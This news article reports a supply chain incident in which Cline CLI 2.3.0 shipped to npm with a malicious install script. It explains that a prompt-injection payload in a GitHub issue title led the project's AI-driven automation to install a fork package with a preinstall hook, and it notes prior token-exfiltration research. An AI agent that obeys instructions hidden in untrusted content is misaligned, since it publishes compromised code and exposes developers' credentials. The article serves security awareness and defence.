Cline CLI Supply Chain Attack Exposes Emerging AI Agent Risks in npm Ecosystem

Within a single workday, a routine npm install turned into a supply chain incident that is now reverberating across the open source and AI security communities, according to an analysis from Michael Bargury, CTO of Zenity.

The maintainers of Cline disclosed that version 2.3.0 of the Cline CLI was published to npm with unauthorized modifications. For roughly eight hours, developers who installed the package also pulled code associated with the OpenClaw ecosystem due to a malicious install script embedded in the release. The package was later removed, and an advisory was issued.

What initially appeared to be a standard npm compromise quickly evolved into something more revealing: a case study in how prompt injection can cascade through automated pipelines and result in a public release.

A Prompt Injection That Reached Production

The exploit chain traces back to a GitHub issue submitted to the Cline repository. The issue title contained a carefully crafted payload that instructed automation to install a specific helper package before running GitHub CLI commands. The reference pointed to a commit on a fork that added a malicious preinstall requirement to the project’s package.json.

That preinstall hook fetched code from an external source. The referenced content was later deleted, but the automation damage had already been done.

Security researcher Adnan Khan had privately reported a supply chain weakness in Cline weeks earlier. His proof of concept demonstrated how attackers could abuse prompt injection to influence automated GitHub Actions workflows and potentially exfiltrate repository authentication tokens. According to his disclosure timeline, he first contacted the project maintainers on January 1 and published details on February 7 after not receiving a response.

The malicious issue appeared on January 28, before the full technical blog post was released. That timing suggests the attacker identified and weaponized the publicly visible proof of concept before the broader community had time to absorb the implications.

Automation as an Attack Surface

Michael Bargury, CTO of Zenity, published a technical reconstruction of the incident that maps how the injected issue propagated into the build and publication workflow. His analysis highlights how AI influenced automation pipelines can become high impact attack vectors if they interpret untrusted content as instructions.

The episode reinforces a growing reality in modern software development: CI pipelines, GitHub Actions, and AI assisted tooling are not passive infrastructure. They are decision making systems that execute code based on contextual signals. When those signals include untrusted user input, the boundary between bug report and command execution can disappear.

Chris Hughes, VP of Security Strategy at Zenity, said the industry has underestimated this class of risk.

“We have been talking about AI supply chain security in theoretical terms for too long, and this week it became operational reality. When a single issue title can influence an automated build pipeline and affect a published release, the risk is no longer theoretical.

The industry needs to start recognizing AI agents as privileged actors that require governance.”

Unauthorized npm Publication and OpenClaw Link

According to the public advisory, the unauthorized publication affected Cline CLI version 2.3.0 and remained live for approximately eight hours. During that window, users who installed the package received a modified build containing a malicious install script tied to the OpenClaw ecosystem.

OpenClaw has been associated with research into autonomous AI agents capable of interacting with development environments. In this case, the name surfaced inside an installation hook, suggesting that the attacker’s objective may have included credential access or repository token exfiltration rather than immediate destructive behavior.

The language used in the advisory described the compromise as unauthorized and characterized the impact as limited in duration. But in supply chain security, duration is often less important than trust boundaries. Even a short lived publication can seed compromised environments across CI pipelines, local developer machines, and downstream dependencies.

Raptor and Open Source Forensics

The incident also served as a test case for emerging open source forensic tooling. Analysts using Raptor’s /oss-forensics command were able to trace the malicious commit and identify the compromising user account in short order. The speed of that analysis underscores both the transparency of open source ecosystems and the importance of rapid investigation when automation pipelines are involved.

Open repositories create immutable audit trails, but only if someone is actively reviewing them. In this case, forensic tooling helped compress what could have been days of manual review into a focused investigation.

The Bigger Signal for AI and GitHub Security

This breach sits at the intersection of several 2026 realities: AI assisted coding, GitHub Actions automation, npm supply chain risk, and prompt injection vulnerabilities. Each element has been discussed independently. Together, they form a new threat model.

AI systems embedded in development workflows are increasingly treated as helpers. Yet when those systems can influence builds, publish artifacts, or access authentication tokens, they effectively operate with privileged authority.

The Cline incident demonstrates how an attacker can move from a public issue thread to a published npm package without breaching a server in the traditional sense. Instead of exploiting a memory corruption flaw or stolen password, the attacker exploited trust in automation.

For developers searching terms like Cline CLI unauthorized npm publication, OpenClaw npm compromise, GitHub Actions prompt injection attack, or AI supply chain security incident, this case will likely become a reference point.

The broader lesson is not that AI should be removed from development workflows. It is that AI agents and automation pipelines must be treated as privileged actors. That means strict input validation, isolation of build steps, token scoping, and human review gates before publication.

The open source ecosystem thrives on speed and automation. This week, it was reminded that speed without guardrails can ship more than code.